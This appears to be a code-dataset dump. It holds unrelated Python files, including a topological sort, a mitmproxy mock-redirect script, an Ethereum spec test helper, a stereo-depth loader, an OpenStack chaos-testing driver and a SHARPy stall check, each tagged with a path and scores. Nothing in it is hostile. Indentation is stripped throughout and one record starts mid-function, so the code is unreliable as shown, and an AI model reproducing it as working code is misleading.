maxSimilitude = max(scores)
maxSimilitudeIndex = scores.index(maxSimilitude)
secScores = []
secScores += scores
secScores[maxSimilitudeIndex] = 0
secMaxSimilitude = max(secScores)
secMaxSimilitudeIndex = scores.index(secMaxSimilitude)
print(scores) # Debug
if (secMaxSimilitude == maxSimilitude):
print("2 phrases de meme similarite !")
return "Je ne comprends pas cette phrase."
if (maxSimilitude == 0): # Si on a aucun mot commun nulle part
print("Pas de mot commun !")
return "Je ne comprends pas cette phrase."
if maxSimilitude > 3 * secMaxSimilitude:
if (maxSimilitude >= 10):
return (skillsLoader.SkillsList[maxSimilitudeIndex].execute(orderJson))
return ("Je ne comprends pas cette phrase")
| 0.39257 | 0.32029 |
"""Algorithms for topological sorting"""
import queue
from typing import List
from .searching import dfs_recursive
from .searching_strategy import DFSStrategy
from ..directed_graph import DirectedGraph
from ..graph import Vertex
class DirectedCyclicGraphError(ValueError):
pass
def sort_topological_using_inputs(graph: DirectedGraph) -> List[Vertex]:
"""Topological sorting algorithm using predecessors counting.
:param graph: a directed graph
:return: topological order of vertices
:raise ValueError: if given graph contains a cycle"""
if graph.edges_count == 0:
return list(graph.vertices)
vertex_queue = queue.PriorityQueue()
input_degrees = {v: graph.input_degree(v) for v in graph.vertices}
order = []
for vertex in graph.vertices:
if input_degrees[vertex] == 0:
vertex_queue.put(vertex)
while not vertex_queue.empty():
vertex = vertex_queue.get()
order.append(vertex)
del input_degrees[vertex]
for neighbour in graph.neighbours(vertex):
input_degrees[neighbour] -= 1
if input_degrees[neighbour] == 0:
vertex_queue.put(neighbour)
if len(order) != graph.vertices_count:
raise DirectedCyclicGraphError("Given graph contains a cycle")
return order
def sort_topological_using_dfs(graph: DirectedGraph) -> List[Vertex]:
"""Topological sorting algorithm using DFS.
:param graph: a directed graph
:return: topological order of vertices
:raise ValueError: if given graph contains a cycle"""
if graph.edges_count == 0:
return list(graph.vertices)
strategy = _TopologicalStrategy()
dfs_recursive(graph, strategy, graph.vertices)
return list(reversed(strategy.order))
class _TopologicalStrategy(DFSStrategy):
def __init__(self):
self.order = []
def for_root(self, root):
pass
def on_entry(self, vertex):
pass
def on_next_vertex(self, vertex, neighbour):
pass
def on_exit(self, vertex):
self.order.append(vertex)
def on_edge_to_visited(self, vertex, neighbour):
raise DirectedCyclicGraphError("The graph contains a cycle")
|
algolib/graphs/algorithms/topological_sorting.py
|
"""Algorithms for topological sorting"""
import queue
from typing import List
from .searching import dfs_recursive
from .searching_strategy import DFSStrategy
from ..directed_graph import DirectedGraph
from ..graph import Vertex
class DirectedCyclicGraphError(ValueError):
pass
def sort_topological_using_inputs(graph: DirectedGraph) -> List[Vertex]:
"""Topological sorting algorithm using predecessors counting.
:param graph: a directed graph
:return: topological order of vertices
:raise ValueError: if given graph contains a cycle"""
if graph.edges_count == 0:
return list(graph.vertices)
vertex_queue = queue.PriorityQueue()
input_degrees = {v: graph.input_degree(v) for v in graph.vertices}
order = []
for vertex in graph.vertices:
if input_degrees[vertex] == 0:
vertex_queue.put(vertex)
while not vertex_queue.empty():
vertex = vertex_queue.get()
order.append(vertex)
del input_degrees[vertex]
for neighbour in graph.neighbours(vertex):
input_degrees[neighbour] -= 1
if input_degrees[neighbour] == 0:
vertex_queue.put(neighbour)
if len(order) != graph.vertices_count:
raise DirectedCyclicGraphError("Given graph contains a cycle")
return order
def sort_topological_using_dfs(graph: DirectedGraph) -> List[Vertex]:
"""Topological sorting algorithm using DFS.
:param graph: a directed graph
:return: topological order of vertices
:raise ValueError: if given graph contains a cycle"""
if graph.edges_count == 0:
return list(graph.vertices)
strategy = _TopologicalStrategy()
dfs_recursive(graph, strategy, graph.vertices)
return list(reversed(strategy.order))
class _TopologicalStrategy(DFSStrategy):
def __init__(self):
self.order = []
def for_root(self, root):
pass
def on_entry(self, vertex):
pass
def on_next_vertex(self, vertex, neighbour):
pass
def on_exit(self, vertex):
self.order.append(vertex)
def on_edge_to_visited(self, vertex, neighbour):
raise DirectedCyclicGraphError("The graph contains a cycle")
| 0.927157 | 0.674767 |
from urllib.parse import urlparse
from mitmproxy import http
from lyrebird import log
import os
import json
import logging
import re
_logger = log.get_logger()
_logger.setLevel(logging.INFO)
PROXY_PORT = int(os.environ.get('PROXY_PORT'))
PROXY_FILTERS = json.loads(os.environ.get('PROXY_FILTERS'))
def to_mock_server(flow: http.HTTPFlow):
raw_url = urlparse(flow.request.url)
raw_host = raw_url.hostname
if raw_url.port:
raw_host += f':{raw_url.port}'
# mock path 为/mock开头加上原始url
flow.request.path = '/mock/' + flow.request.url
# mock scheme 统一为http
flow.request.scheme = 'http'
# mock server port
flow.request.port = PROXY_PORT
# mock server ip
flow.request.host = '127.0.0.1'
# device real ip
address = flow.client_conn.address[0]
# 获取的address是IPv6(内嵌IPv4地址表示法),需要获取IPv4地址,需要做以下处理
if address.startswith('::ffff:'):
address = address.split('::ffff:')[1]
flow.request.headers['Lyrebird-Client-Address'] = address
flow.request.headers['Mitmproxy-Proxy'] = address
flow.request.headers['Proxy-Raw-Headers'] = json.dumps({name: flow.request.headers[name] for name in flow.request.headers}, ensure_ascii=False)
_logger.info('Redirect-> %s' % flow.request.url[:100])
def request(flow: http.HTTPFlow):
_logger.info(flow.request.url[:100])
if 'mitm.it' in flow.request.url:
# Support mitm.it
return
if not PROXY_FILTERS:
to_mock_server(flow)
return
for _filter in PROXY_FILTERS:
if re.search(_filter, flow.request.url):
to_mock_server(flow)
break
def responseheaders(flow):
"""
Enables streaming for all responses.
This is equivalent to passing `--set stream_large_bodies=1` to mitmproxy.
"""
if 'mitm.it' in flow.request.url:
# Support mitm.it
flow.response.stream = False
return
flow.response.stream = True
command = flow.response.headers.get('Lyrebird-Mitmproxy-Command')
if command == 'kill':
flow.kill()
|
lyrebird/proxy/mitm_script.py
|
from urllib.parse import urlparse
from mitmproxy import http
from lyrebird import log
import os
import json
import logging
import re
_logger = log.get_logger()
_logger.setLevel(logging.INFO)
PROXY_PORT = int(os.environ.get('PROXY_PORT'))
PROXY_FILTERS = json.loads(os.environ.get('PROXY_FILTERS'))
def to_mock_server(flow: http.HTTPFlow):
raw_url = urlparse(flow.request.url)
raw_host = raw_url.hostname
if raw_url.port:
raw_host += f':{raw_url.port}'
# mock path 为/mock开头加上原始url
flow.request.path = '/mock/' + flow.request.url
# mock scheme 统一为http
flow.request.scheme = 'http'
# mock server port
flow.request.port = PROXY_PORT
# mock server ip
flow.request.host = '127.0.0.1'
# device real ip
address = flow.client_conn.address[0]
# 获取的address是IPv6(内嵌IPv4地址表示法),需要获取IPv4地址,需要做以下处理
if address.startswith('::ffff:'):
address = address.split('::ffff:')[1]
flow.request.headers['Lyrebird-Client-Address'] = address
flow.request.headers['Mitmproxy-Proxy'] = address
flow.request.headers['Proxy-Raw-Headers'] = json.dumps({name: flow.request.headers[name] for name in flow.request.headers}, ensure_ascii=False)
_logger.info('Redirect-> %s' % flow.request.url[:100])
def request(flow: http.HTTPFlow):
_logger.info(flow.request.url[:100])
if 'mitm.it' in flow.request.url:
# Support mitm.it
return
if not PROXY_FILTERS:
to_mock_server(flow)
return
for _filter in PROXY_FILTERS:
if re.search(_filter, flow.request.url):
to_mock_server(flow)
break
def responseheaders(flow):
"""
Enables streaming for all responses.
This is equivalent to passing `--set stream_large_bodies=1` to mitmproxy.
"""
if 'mitm.it' in flow.request.url:
# Support mitm.it
flow.response.stream = False
return
flow.response.stream = True
command = flow.response.headers.get('Lyrebird-Mitmproxy-Command')
if command == 'kill':
flow.kill()
| 0.36977 | 0.075176 |
def for_ops(state, operations, fn) -> None:
for operation in operations:
fn(state, operation)
def get_process_calls(spec):
return {
# PHASE0
'process_block_header':
lambda state, block: spec.process_block_header(state, block),
'process_randao':
lambda state, block: spec.process_randao(state, block.body),
'process_eth1_data':
lambda state, block: spec.process_eth1_data(state, block.body),
'process_proposer_slashing':
lambda state, block: for_ops(state, block.body.proposer_slashings, spec.process_proposer_slashing),
'process_attester_slashing':
lambda state, block: for_ops(state, block.body.attester_slashings, spec.process_attester_slashing),
'process_shard_header':
lambda state, block: for_ops(state, block.body.shard_headers, spec.process_shard_header),
'process_attestation':
lambda state, block: for_ops(state, block.body.attestations, spec.process_attestation),
'process_deposit':
lambda state, block: for_ops(state, block.body.deposits, spec.process_deposit),
'process_voluntary_exit':
lambda state, block: for_ops(state, block.body.voluntary_exits, spec.process_voluntary_exit),
# Altair
'process_sync_aggregate':
lambda state, block: spec.process_sync_aggregate(state, block.body.sync_aggregate),
# Merge
'process_application_payload':
lambda state, block: spec.process_application_payload(state, block.body),
# TODO: add sharding processing functions when spec stabilizes.
# Custody Game
'process_custody_game_operations':
lambda state, block: spec.process_custody_game_operations(state, block.body),
}
def run_block_processing_to(spec, state, block, process_name: str):
"""
Processes to the block transition, up to, but not including, the sub-transition named ``process_name``.
Returns a Callable[[state, block], None] for the remaining ``process_name`` transition.
Tests should create full blocks to ensure a valid state transition, even if the operation itself is isolated.
(e.g. latest_header in the beacon state is up-to-date in a sync-committee test).
A test prepares a pre-state by calling this function, output the pre-state,
and it can then proceed to run the returned callable, and output a post-state.
"""
print(f"state.slot {state.slot} block.slot {block.slot}")
# transition state to slot before block state transition
if state.slot < block.slot:
spec.process_slots(state, block.slot)
print(f"state.slot {state.slot} block.slot {block.slot} A")
# process components of block transition
for name, call in get_process_calls(spec).items():
if name == process_name:
return call
# only run when present. Later phases introduce more to the block-processing.
if hasattr(spec, name):
call(state, block)
|
tests/core/pyspec/eth2spec/test/helpers/block_processing.py
|
def for_ops(state, operations, fn) -> None:
for operation in operations:
fn(state, operation)
def get_process_calls(spec):
return {
# PHASE0
'process_block_header':
lambda state, block: spec.process_block_header(state, block),
'process_randao':
lambda state, block: spec.process_randao(state, block.body),
'process_eth1_data':
lambda state, block: spec.process_eth1_data(state, block.body),
'process_proposer_slashing':
lambda state, block: for_ops(state, block.body.proposer_slashings, spec.process_proposer_slashing),
'process_attester_slashing':
lambda state, block: for_ops(state, block.body.attester_slashings, spec.process_attester_slashing),
'process_shard_header':
lambda state, block: for_ops(state, block.body.shard_headers, spec.process_shard_header),
'process_attestation':
lambda state, block: for_ops(state, block.body.attestations, spec.process_attestation),
'process_deposit':
lambda state, block: for_ops(state, block.body.deposits, spec.process_deposit),
'process_voluntary_exit':
lambda state, block: for_ops(state, block.body.voluntary_exits, spec.process_voluntary_exit),
# Altair
'process_sync_aggregate':
lambda state, block: spec.process_sync_aggregate(state, block.body.sync_aggregate),
# Merge
'process_application_payload':
lambda state, block: spec.process_application_payload(state, block.body),
# TODO: add sharding processing functions when spec stabilizes.
# Custody Game
'process_custody_game_operations':
lambda state, block: spec.process_custody_game_operations(state, block.body),
}
def run_block_processing_to(spec, state, block, process_name: str):
"""
Processes to the block transition, up to, but not including, the sub-transition named ``process_name``.
Returns a Callable[[state, block], None] for the remaining ``process_name`` transition.
Tests should create full blocks to ensure a valid state transition, even if the operation itself is isolated.
(e.g. latest_header in the beacon state is up-to-date in a sync-committee test).
A test prepares a pre-state by calling this function, output the pre-state,
and it can then proceed to run the returned callable, and output a post-state.
"""
print(f"state.slot {state.slot} block.slot {block.slot}")
# transition state to slot before block state transition
if state.slot < block.slot:
spec.process_slots(state, block.slot)
print(f"state.slot {state.slot} block.slot {block.slot} A")
# process components of block transition
for name, call in get_process_calls(spec).items():
if name == process_name:
return call
# only run when present. Later phases introduce more to the block-processing.
if hasattr(spec, name):
call(state, block)
| 0.447702 | 0.353735 |
import os
import random
import pandas as pd
import numpy as np
import torch
import torch.utils.data as data
from PIL import Image
import scipy.misc as ssc
from psmnet.dataloader import preprocess
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
calib = [[725.0087, 0, 620.5], [0, 725.0087, 187], [0, 0, 1]]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def dataloader(root_dir, split):
"""
Function to load data for Apollo
:param root_dir: dataset directory
:param split_file: file names
:return: left, right and disparity file lists
"""
if split == "train":
scenes = ["Scene01", "Scene02", "Scene06", "Scene18"]
else:
scenes = ["Scene20"]
sub_scenes = ["15-deg-left", "30-deg-left", "15-deg-right", "30-deg-right",
"clone", "morning", "rain", "fog", "overcast", "sunset"]
left = []
right = []
disp = []
for scene in scenes:
dir = os.path.join(root_dir, scene)
for sub in sub_scenes:
sub_dir = os.path.join(dir, sub, "frames")
path, dirs, files = os.walk(os.path.join(sub_dir, "rgb", "Camera_0")).__next__()
num_files = len(files)
for i in range(num_files):
file = "{:05d}".format(i)
left.append(os.path.join(sub_dir, "rgb", "Camera_0",
"rgb_{}.jpg".format(file)))
right.append(os.path.join(sub_dir, "rgb", "Camera_1",
"rgb_{}.jpg".format(file)))
disp.append(os.path.join(sub_dir, "depth", "Camera_0",
"depth_{}.png".format(file)))
return left, right, disp
def default_loader(path):
return Image.open(path).convert('RGB')
def disparity_loader(path):
depth = np.array(Image.open(path)).astype(np.float64) / 100.0 # convert to meters
baseline = 0.54
disparity = (1.5 * baseline * calib[0][0]) / (depth + 1e-6) # enhance disparity for better training
return disparity
class ImageLoader(data.Dataset):
def __init__(self, left, right, left_disparity, training,
loader=default_loader, dploader=disparity_loader):
self.left = left
self.right = right
self.disp_L = left_disparity
self.loader = loader
self.dploader = dploader
self.training = training
def __getitem__(self, index):
left = self.left[index]
right = self.right[index]
disp_L = self.disp_L[index]
left_img = self.loader(left)
right_img = self.loader(right)
dataL = self.dploader(disp_L)
if self.training:
w, h = left_img.size
th, tw = 256, 512
x1 = random.randint(0, w - tw)
y1 = random.randint(0, h - th)
left_img = left_img.crop((x1, y1, x1 + tw, y1 + th))
right_img = right_img.crop((x1, y1, x1 + tw, y1 + th))
dataL = dataL[y1:y1 + th, x1:x1 + tw]
processed = preprocess.get_transform(augment=False)
left_img = processed(left_img)
right_img = processed(right_img)
else:
w, h = left_img.size
left_img = left_img.crop((w - 1200, h - 352, w, h))
right_img = right_img.crop((w - 1200, h - 352, w, h))
w1, h1 = left_img.size
dataL = dataL[h - 352:h, w - 1200:w]
processed = preprocess.get_transform(augment=False)
left_img = processed(left_img)
right_img = processed(right_img)
dataL = torch.from_numpy(dataL).float()
return left_img, right_img, dataL
def __len__(self):
return len(self.left)
|
psmnet/dataloader/VKittiLoader.py
|
import os
import random
import pandas as pd
import numpy as np
import torch
import torch.utils.data as data
from PIL import Image
import scipy.misc as ssc
from psmnet.dataloader import preprocess
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
calib = [[725.0087, 0, 620.5], [0, 725.0087, 187], [0, 0, 1]]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def dataloader(root_dir, split):
"""
Function to load data for Apollo
:param root_dir: dataset directory
:param split_file: file names
:return: left, right and disparity file lists
"""
if split == "train":
scenes = ["Scene01", "Scene02", "Scene06", "Scene18"]
else:
scenes = ["Scene20"]
sub_scenes = ["15-deg-left", "30-deg-left", "15-deg-right", "30-deg-right",
"clone", "morning", "rain", "fog", "overcast", "sunset"]
left = []
right = []
disp = []
for scene in scenes:
dir = os.path.join(root_dir, scene)
for sub in sub_scenes:
sub_dir = os.path.join(dir, sub, "frames")
path, dirs, files = os.walk(os.path.join(sub_dir, "rgb", "Camera_0")).__next__()
num_files = len(files)
for i in range(num_files):
file = "{:05d}".format(i)
left.append(os.path.join(sub_dir, "rgb", "Camera_0",
"rgb_{}.jpg".format(file)))
right.append(os.path.join(sub_dir, "rgb", "Camera_1",
"rgb_{}.jpg".format(file)))
disp.append(os.path.join(sub_dir, "depth", "Camera_0",
"depth_{}.png".format(file)))
return left, right, disp
def default_loader(path):
return Image.open(path).convert('RGB')
def disparity_loader(path):
depth = np.array(Image.open(path)).astype(np.float64) / 100.0 # convert to meters
baseline = 0.54
disparity = (1.5 * baseline * calib[0][0]) / (depth + 1e-6) # enhance disparity for better training
return disparity
class ImageLoader(data.Dataset):
def __init__(self, left, right, left_disparity, training,
loader=default_loader, dploader=disparity_loader):
self.left = left
self.right = right
self.disp_L = left_disparity
self.loader = loader
self.dploader = dploader
self.training = training
def __getitem__(self, index):
left = self.left[index]
right = self.right[index]
disp_L = self.disp_L[index]
left_img = self.loader(left)
right_img = self.loader(right)
dataL = self.dploader(disp_L)
if self.training:
w, h = left_img.size
th, tw = 256, 512
x1 = random.randint(0, w - tw)
y1 = random.randint(0, h - th)
left_img = left_img.crop((x1, y1, x1 + tw, y1 + th))
right_img = right_img.crop((x1, y1, x1 + tw, y1 + th))
dataL = dataL[y1:y1 + th, x1:x1 + tw]
processed = preprocess.get_transform(augment=False)
left_img = processed(left_img)
right_img = processed(right_img)
else:
w, h = left_img.size
left_img = left_img.crop((w - 1200, h - 352, w, h))
right_img = right_img.crop((w - 1200, h - 352, w, h))
w1, h1 = left_img.size
dataL = dataL[h - 352:h, w - 1200:w]
processed = preprocess.get_transform(augment=False)
left_img = processed(left_img)
right_img = processed(right_img)
dataL = torch.from_numpy(dataL).float()
return left_img, right_img, dataL
def __len__(self):
return len(self.left)
| 0.639173 | 0.331539 |
import logging
from openstack import connection, config
from . import AbstractDriver
from ..node import Node, NodeState
def create_connection_from_config(name=None):
""" Creates a new open stack connection """
occ = config.OpenStackConfig()
cloud = occ.get_one_cloud(name)
return connection.from_config(cloud_config=cloud)
def get_all_ips(server):
"""
Digs out all the IPs from the server.addresses field
of an open stack server.
"""
output = []
addresses = server.addresses
for addr_list in addresses.values():
for addr in addr_list:
for name, val in addr.items():
if name == "addr":
output.append(val)
return sorted(output)
# https://developer.openstack.org/sdks/python/openstacksdk/users/resources/compute/v2/server.html#openstack.compute.v2.server.Server
MAPPING_STATES_STATUS = {
"ACTIVE": NodeState.UP,
"STOPPED": NodeState.DOWN,
"SHUTOFF": NodeState.DOWN,
}
def server_status_to_state(status):
return MAPPING_STATES_STATUS.get(status.upper(), NodeState.UNKNOWN)
def create_node_from_server(server):
""" Translate OpenStack server representation into a Node object.
"""
return Node(
id=server.id,
ip=get_all_ips(server)[-1],
az=server.availability_zone,
name=server.name,
state=server_status_to_state(server.status),
)
class OpenStackDriver(AbstractDriver):
"""
Concrete implementation of the OpenStack cloud driver.
"""
def __init__(self, cloud=None, conn=None, logger=None):
self.logger = logger or logging.getLogger(__name__)
self.conn = conn or create_connection_from_config(cloud)
self.remote_servers = []
def sync(self):
""" Downloads a fresh set of nodes form the API.
"""
self.logger.debug("Synchronizing remote nodes")
self.remote_servers = list(self.conn.compute.servers())
self.logger.info("Fetched %s remote servers" % len(self.remote_servers))
def get_by_ip(self, ip):
""" Retreive an instance of Node by its IP.
"""
for server in self.remote_servers:
addresses = get_all_ips(server)
if not addresses:
self.logger.warning("No addresses found: %s", server)
else:
for addr in addresses:
if addr == ip:
return create_node_from_server(server)
return None
def stop(self, node):
""" Stop a Node.
"""
self.conn.compute.stop_server(node.id)
def start(self, node):
""" Start a Node.
"""
self.conn.compute.start_server(node.id)
def delete(self, node):
""" Delete a Node permanently.
"""
self.conn.compute.delete_server(node.id)
|
powerfulseal/clouddrivers/open_stack_driver.py
|
import logging
from openstack import connection, config
from . import AbstractDriver
from ..node import Node, NodeState
def create_connection_from_config(name=None):
""" Creates a new open stack connection """
occ = config.OpenStackConfig()
cloud = occ.get_one_cloud(name)
return connection.from_config(cloud_config=cloud)
def get_all_ips(server):
"""
Digs out all the IPs from the server.addresses field
of an open stack server.
"""
output = []
addresses = server.addresses
for addr_list in addresses.values():
for addr in addr_list:
for name, val in addr.items():
if name == "addr":
output.append(val)
return sorted(output)
# https://developer.openstack.org/sdks/python/openstacksdk/users/resources/compute/v2/server.html#openstack.compute.v2.server.Server
MAPPING_STATES_STATUS = {
"ACTIVE": NodeState.UP,
"STOPPED": NodeState.DOWN,
"SHUTOFF": NodeState.DOWN,
}
def server_status_to_state(status):
return MAPPING_STATES_STATUS.get(status.upper(), NodeState.UNKNOWN)
def create_node_from_server(server):
""" Translate OpenStack server representation into a Node object.
"""
return Node(
id=server.id,
ip=get_all_ips(server)[-1],
az=server.availability_zone,
name=server.name,
state=server_status_to_state(server.status),
)
class OpenStackDriver(AbstractDriver):
"""
Concrete implementation of the OpenStack cloud driver.
"""
def __init__(self, cloud=None, conn=None, logger=None):
self.logger = logger or logging.getLogger(__name__)
self.conn = conn or create_connection_from_config(cloud)
self.remote_servers = []
def sync(self):
""" Downloads a fresh set of nodes form the API.
"""
self.logger.debug("Synchronizing remote nodes")
self.remote_servers = list(self.conn.compute.servers())
self.logger.info("Fetched %s remote servers" % len(self.remote_servers))
def get_by_ip(self, ip):
""" Retreive an instance of Node by its IP.
"""
for server in self.remote_servers:
addresses = get_all_ips(server)
if not addresses:
self.logger.warning("No addresses found: %s", server)
else:
for addr in addresses:
if addr == ip:
return create_node_from_server(server)
return None
def stop(self, node):
""" Stop a Node.
"""
self.conn.compute.stop_server(node.id)
def start(self, node):
""" Start a Node.
"""
self.conn.compute.start_server(node.id)
def delete(self, node):
""" Delete a Node permanently.
"""
self.conn.compute.delete_server(node.id)
| 0.620162 | 0.112356 |
import os
import numpy as np
from tvtk.api import tvtk, write_data
import sharpy.utils.algebra as algebra
import sharpy.utils.cout_utils as cout
from sharpy.utils.settings import str2bool
from sharpy.utils.solver_interface import solver, BaseSolver
import sharpy.utils.settings as settings
from sharpy.utils.datastructures import init_matrix_structure, standalone_ctypes_pointer
import sharpy.aero.utils.uvlmlib as uvlmlib
@solver
class StallCheck(BaseSolver):
"""
Outputs the incidence angle of every panel of the surface.
"""
solver_id = 'StallCheck'
solver_classification = 'post-processor'
settings_types = dict()
settings_default = dict()
settings_description = dict()
settings_types['print_info'] = 'bool'
settings_default['print_info'] = True
settings_description['print_info'] = 'Print info to screen '
settings_types['airfoil_stall_angles'] = 'dict'
settings_default['airfoil_stall_angles'] = dict()
settings_description['airfoil_stall_angles'] = 'Dictionary of stall angles for each airfoil'
settings_types['output_degrees'] = 'bool'
settings_default['output_degrees'] = False
settings_description['output_degrees'] = 'Output incidence angles in degrees vs radians'
settings_table = settings.SettingsTable()
__doc__ += settings_table.generate(settings_types, settings_default, settings_description)
def __init__(self):
self.settings = None
self.data = None
self.ts_max = None
self.ts = None
def initialise(self, data, custom_settings=None):
self.data = data
if custom_settings is None:
self.settings = data.settings[self.solver_id]
else:
self.settings = custom_settings
settings.to_custom_types(self.settings, self.settings_types, self.settings_default)
self.ts_max = len(self.data.structure.timestep_info)
def run(self, online=False):
if not online:
for self.ts in range(self.ts_max):
self.check_stall()
cout.cout_wrap('...Finished', 1)
else:
self.ts = len(self.data.structure.timestep_info) - 1
self.check_stall()
return self.data
def check_stall(self):
# add entry to dictionary for postproc
tstep = self.data.aero.timestep_info[self.ts]
tstep.postproc_cell['incidence_angle'] = init_matrix_structure(dimensions=tstep.dimensions,
with_dim_dimension=False)
# create ctypes pointers
tstep.postproc_cell['incidence_angle_ct_list'] = None
tstep.postproc_cell['incidence_angle_ct_pointer'] = None
tstep.postproc_cell['incidence_angle_ct_list'], tstep.postproc_cell['incidence_angle_ct_pointer'] = \
standalone_ctypes_pointer(tstep.postproc_cell['incidence_angle'])
# call calculate
uvlmlib.uvlm_calculate_incidence_angle(self.data.aero.timestep_info[self.ts],
self.data.structure.timestep_info[self.ts])
# calculate ratio of stalled panels and print
stalled_panels = False
stalled_surfs = np.zeros((tstep.n_surf, ), dtype=int)
added_panels = []
for i_surf in range(tstep.n_surf):
added_panels.append([])
for i_elem in range(self.data.structure.num_elem):
for i_local_node in range(self.data.structure.num_node_elem):
airfoil_id = self.data.aero.aero_dict['airfoil_distribution'][i_elem, i_local_node]
if self.settings['airfoil_stall_angles']:
i_global_node = self.data.structure.connectivities[i_elem, i_local_node]
for i_dict in self.data.aero.struct2aero_mapping[i_global_node]:
i_surf = i_dict['i_surf']
i_n = i_dict['i_n']
if i_n in added_panels[i_surf]:
continue
if i_n == tstep.dimensions[i_surf][1]:
continue
limits = self.settings['airfoil_stall_angles'][str(airfoil_id)]
if tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] < float(limits[0]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
elif tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] > float(limits[1]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
if stalled_panels:
if self.settings['print_info']:
cout.cout_wrap('Some panel has an incidence angle out of the linear region', 1)
cout.cout_wrap('The number of stalled panels per surface id are:', 1)
for i_surf in range(tstep.n_surf):
cout.cout_wrap('\ti_surf = ' + str(i_surf) + ': ' + str(stalled_surfs[i_surf]) + ' panels.', 1)
# cout.cout_wrap('In total, the ratio of stalled panels is: ', str(stalled_surfs.sum()/))
if self.settings['output_degrees']:
for i_surf in range(tstep.n_surf):
tstep.postproc_cell['incidence_angle'][i_surf] *= 180/np.pi
|
sharpy/postproc/stallcheck.py
|
import os
import numpy as np
from tvtk.api import tvtk, write_data
import sharpy.utils.algebra as algebra
import sharpy.utils.cout_utils as cout
from sharpy.utils.settings import str2bool
from sharpy.utils.solver_interface import solver, BaseSolver
import sharpy.utils.settings as settings
from sharpy.utils.datastructures import init_matrix_structure, standalone_ctypes_pointer
import sharpy.aero.utils.uvlmlib as uvlmlib
@solver
class StallCheck(BaseSolver):
"""
Outputs the incidence angle of every panel of the surface.
"""
solver_id = 'StallCheck'
solver_classification = 'post-processor'
settings_types = dict()
settings_default = dict()
settings_description = dict()
settings_types['print_info'] = 'bool'
settings_default['print_info'] = True
settings_description['print_info'] = 'Print info to screen '
settings_types['airfoil_stall_angles'] = 'dict'
settings_default['airfoil_stall_angles'] = dict()
settings_description['airfoil_stall_angles'] = 'Dictionary of stall angles for each airfoil'
settings_types['output_degrees'] = 'bool'
settings_default['output_degrees'] = False
settings_description['output_degrees'] = 'Output incidence angles in degrees vs radians'
settings_table = settings.SettingsTable()
__doc__ += settings_table.generate(settings_types, settings_default, settings_description)
def __init__(self):
self.settings = None
self.data = None
self.ts_max = None
self.ts = None
def initialise(self, data, custom_settings=None):
self.data = data
if custom_settings is None:
self.settings = data.settings[self.solver_id]
else:
self.settings = custom_settings
settings.to_custom_types(self.settings, self.settings_types, self.settings_default)
self.ts_max = len(self.data.structure.timestep_info)
def run(self, online=False):
if not online:
for self.ts in range(self.ts_max):
self.check_stall()
cout.cout_wrap('...Finished', 1)
else:
self.ts = len(self.data.structure.timestep_info) - 1
self.check_stall()
return self.data
def check_stall(self):
# add entry to dictionary for postproc
tstep = self.data.aero.timestep_info[self.ts]
tstep.postproc_cell['incidence_angle'] = init_matrix_structure(dimensions=tstep.dimensions,
with_dim_dimension=False)
# create ctypes pointers
tstep.postproc_cell['incidence_angle_ct_list'] = None
tstep.postproc_cell['incidence_angle_ct_pointer'] = None
tstep.postproc_cell['incidence_angle_ct_list'], tstep.postproc_cell['incidence_angle_ct_pointer'] = \
standalone_ctypes_pointer(tstep.postproc_cell['incidence_angle'])
# call calculate
uvlmlib.uvlm_calculate_incidence_angle(self.data.aero.timestep_info[self.ts],
self.data.structure.timestep_info[self.ts])
# calculate ratio of stalled panels and print
stalled_panels = False
stalled_surfs = np.zeros((tstep.n_surf, ), dtype=int)
added_panels = []
for i_surf in range(tstep.n_surf):
added_panels.append([])
for i_elem in range(self.data.structure.num_elem):
for i_local_node in range(self.data.structure.num_node_elem):
airfoil_id = self.data.aero.aero_dict['airfoil_distribution'][i_elem, i_local_node]
if self.settings['airfoil_stall_angles']:
i_global_node = self.data.structure.connectivities[i_elem, i_local_node]
for i_dict in self.data.aero.struct2aero_mapping[i_global_node]:
i_surf = i_dict['i_surf']
i_n = i_dict['i_n']
if i_n in added_panels[i_surf]:
continue
if i_n == tstep.dimensions[i_surf][1]:
continue
limits = self.settings['airfoil_stall_angles'][str(airfoil_id)]
if tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] < float(limits[0]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
elif tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] > float(limits[1]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
if stalled_panels:
if self.settings['print_info']:
cout.cout_wrap('Some panel has an incidence angle out of the linear region', 1)
cout.cout_wrap('The number of stalled panels per surface id are:', 1)
for i_surf in range(tstep.n_surf):
cout.cout_wrap('\ti_surf = ' + str(i_surf) + ': ' + str(stalled_surfs[i_surf]) + ' panels.', 1)
# cout.cout_wrap('In total, the ratio of stalled panels is: ', str(stalled_surfs.sum()/))
if self.settings['output_degrees']:
for i_surf in range(tstep.n_surf):
tstep.postproc_cell['incidence_angle'][i_surf] *= 180/np.pi
| 0.556882 | 0.256861 |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error, r2_score
from sklearn.dummy import DummyRegressor
"""
NAME
eda_tools
DESCRIPTION
This module provides functions to automate common procedures in EDA, model
preparation, and data visualization process.
MODULE CONTENTS
inspect_dupes
inspect_nans
view_columns_w_many_nans
drop_columns_w_many_nans
histograms_numeric_columns
boxplots_categorical_columns
scatter_plots
heatmap_numeric_w_dependent_variable
high_corr_w_dependent_variable
high_corr_among_independent_variable
categorical_to_ordinal_transformer
transform_categorical_to_numercial
dummify_categorical_columns
conform_columns
viz_resids
print_error_metrics
"""
